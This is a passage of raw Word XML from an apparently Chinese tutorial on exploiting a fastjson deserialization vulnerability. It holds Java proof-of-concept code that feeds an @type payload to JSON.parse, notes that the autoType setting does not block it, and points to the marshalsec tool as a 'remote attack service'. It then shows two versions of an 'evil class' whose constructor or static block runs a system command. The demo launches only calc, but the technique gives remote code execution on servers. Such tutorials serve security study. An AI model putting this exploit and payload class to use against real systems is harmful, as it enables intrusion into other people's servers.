          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>autoTypeSupport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但对此无效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//        ParserConfig.getGlobalInstance().setAutoTypeSupport(false);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">json = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.lang.Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cn.blingsec.vulns.Poc2022_2577</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="9EF1DD"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(json);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>parseObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(json);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202D5803" w14:textId="77777777" w:rsidR="00A83A99" w:rsidRPr="00A83A99" w:rsidRDefault="00A83A99" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3736D21B" w14:textId="140494CF" w:rsidR="006655D4" w:rsidRDefault="006655D4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程攻击服务：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>arshalsec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE422A1" w14:textId="4FCEF960" w:rsidR="006655D4" w:rsidRDefault="006655D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C370D8" w:rsidRPr="00C370D8">
        <w:t xml:space="preserve"> https://github.com/mbechler/marshalsec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515DEF7F" w14:textId="77777777" w:rsidR="006655D4" w:rsidRDefault="006655D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3276911C" w14:textId="229853C1" w:rsidR="006328F7" w:rsidRDefault="006328F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者直接下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上现成的</w:t>
      </w:r>
      <w:r w:rsidRPr="006328F7">
        <w:t>marshalsec-0.0.3-SNAPSHOT-all.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA54E53" w14:textId="77777777" w:rsidR="00C20D76" w:rsidRDefault="00C20D76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C7E003" w14:textId="77777777" w:rsidR="006328F7" w:rsidRDefault="006328F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7512555C" w14:textId="41E74540" w:rsidR="006328F7" w:rsidRDefault="009C3882" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA5FC7A" w14:textId="77777777" w:rsidR="009C3882" w:rsidRDefault="009C3882" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E38521" w14:textId="6AE2EDC6" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写恶意类代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124BD436" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AE33FC" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>public class evilclass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D0538" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>public evilclass (){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8DF170" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F742316" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Runtime.getRuntime().exec("calc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3572F52F" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}catch (Exception e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1634DF06" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C9F95" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62C5A9" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145B684" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>public static void main(String[] argv){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A77C2CA" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>evilclass e = new evilclass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E88DE4" w14:textId="4F6A019D" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74981ABF" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A471710" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者写法二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C81A0" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import java.lang.Runtime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615B588" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import java.lang.Process;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E21D83" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>public class evilclass{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22931524" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>static {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EC4CA" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F07ADD" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Runtime rt = Runtime.getRuntime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA61EF8" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>String[] commands = {"calc"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFEC9CA" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Process pc = rt.exec(commands);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58901EFA" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pc.waitFor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01396F" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E61BF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46051E48" w14:textId="77777777" w:rsidR="005E61BF" w:rsidRPr="005E61BF" w:rsidRDefault="005E61BF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
